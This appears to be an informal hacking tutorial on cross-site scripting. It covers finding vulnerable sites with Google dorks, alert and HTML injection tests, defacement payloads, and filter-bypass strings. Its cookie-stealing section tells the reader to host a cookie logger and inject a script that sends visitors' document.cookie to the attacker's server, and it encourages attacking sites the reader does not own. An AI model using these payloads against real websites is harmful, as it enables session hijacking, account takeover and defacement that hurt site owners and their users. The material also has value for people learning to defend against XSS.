Welcome To another lesson in which i will be covering XSS..
Table Of Contents
What is XSS?
Finding XSS Vulnerabilities
The Basics On XSS
Deface Methods
Cookie Stealing
Filtration Bypassing
___________________
What is XSS?
'XSS' also known as 'CSS' (Cross Site Scripting, Easily confused with 'Cascading Style Sheets')
is a very common vulnerbility found in Web Applications, 'XSS' allows the attacker to INSERT
malicous code,There are many types of XSS there but i will only explain 3 of them and they are most important
1-'URL XSS' this means that the XSS wont stay on the page it will only get executed if you have the malicous code in the URL and submit the url.
2- Input fields, Where ever you can insert data, it is very common, to be XSS vulnerable, for example say we found a site with a search engine, Now in the search box you enter 'hacker' now hit enter, when the page loads, if it says your data like 'Found 100 Results For hacker' ok now you see its displaying out data on the page, now what if we can exexute code? there is no possible way to execute PHP code in this Attack, but certainly is for HTML, Javascript, but be aware this method.
3-In the Third one you will be able to INSERT data (code) and it will stay on the website.now there are 2 kinds, it depends if we can execute PHP or HTML if we can inject PHP then we can also inject HTML but NOT vice versa, Ok this kinda attack is normally found on Blogs, Shoutboxes, Profiles Forums, just most places where you insert data and it stays there. now HTML is totally different then PHP.HTML downloads to your pc and then your 'Browser' parses/interprets the code, (that's why its source is viewable) With PHP the code is interpreted on the server the script is hosted on, then the data is returned to the browser.For PHP injection its rare, But it don't harm to try. Note: PHP code cant be injected into HTML page!
Finding XSS Vulnerabilities
Well to start finding these vulnerabilities you can start checking out
Blogs, Forums, Shoutboxes, Comment Boxes, Search Box's
and many things
Using 'Google Dorks' to make the finding easier, Ok if you wanna get cracking, goto Google.com and type
inurl:"search.php?q=" now that is a common page and has a lot of results,
Now lets move on to the next part
The Basics On XSS
To know the basic this Picture may help you
The most used Xss injection is
<script>alert("XSS")</script>
This will alert a popup saying xss if the site is vulnerable and this is easily editable means you can also inject
<script>alert("your name or message")</script>
So going previous i told you a google dork ,
search.php?q=
Well we will use this to check for vulnerabilities
To check if it is vulnerable we type
www.site.com/search.php?q=<script>alert("your name or message")</script>
This then gives a popup like this
Many at times this works but if it does not work don't cry we have another way.. :P
You can try injecting HTMl ;)
You can put this two strings to inject html
<h1>anything you want</h1>
<br><br><b><u>any thing you want</u></b>
so our url will be
www.site.com/search.php?q= <h1>anything you want</h1>
or
www.site.com/search.php?q=<br><br><b><u>any thing you want</u></b>
If you see the bold text on the page and newlines then you knows its vuln
Example
Deface Methods
Well now you understand how XSS works, we can explain some simple XSS deface methods, there
are many ways for defacing i will mention some of the best and most I used,
<html><body><IMG SRC="http://site.com/yourDefaceIMAGE.png"></body></html>
the first one being IMG SCR, now for those of you who dont know HTML, IMG SCR is a tag, that
displays the IMAGE linked to it on the webpage.
ok now if u change the link to a valid picture link, and save it and run it you will see your deface page
let us say we have have found a Shoutbox, Comment box, or anything that shows your data after you submitted it you could insert the following to make the picture display on the page.
<IMG SRC="http://site.com/yourDefaceIMAGE.png">
Ok it helps to make your picture big so it stands out and its clear the site got hacked.
Another method is using FLASH videos, its the same has the method below but a little more stylish deface.
<EMBED SRC="http://site.com/xss.swf"
that will execute the flash video linked to it.
Now a popup or a redirection
<script>window.open( "
http://hacking-class.blogspot.com" )</script>
Cookie Stealing
This is the best thing about XSS..
First Get your self a cookie stealer- from here
ok now you have it save it has a .php file and upload to your server, remember to create the file 'log.txt' too
and chmod it to 777, ok now find a XSS vulnerable website, any attack type will do.
ok now your gona want to insert this code.
window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
or
document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
now when user visits the page that got injected too, they will be sent to the site, and cookie will be stolen
the second one is more stealth.
Now it is the time to hijack the cookies
http://site.com/search.php?q=document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
Filteration Bypassing
Alot of sites may seem vulnerable but not executing the code..This will help you
Some common methods to bypass filteration is
')alert('xss');
or
");alert('xss');
that will do the same thing has <script>alert("XSS")</script> on a vulnerable server.
You can also try hexing or base64 encoding your data before you submit,
Please note its bad practice to use alert("XSS") to test for XSS, has ive known sites block the keyword XSS
before.
Some other ways to bypass filteration
<script type=text/javascript>alert("saurav")</script>
<script>alert("saurav")</script>;
<script>alert("saurav");</script>
<script>alert("/saurav"/)</script>
Hope that helped you
Happy Hacking
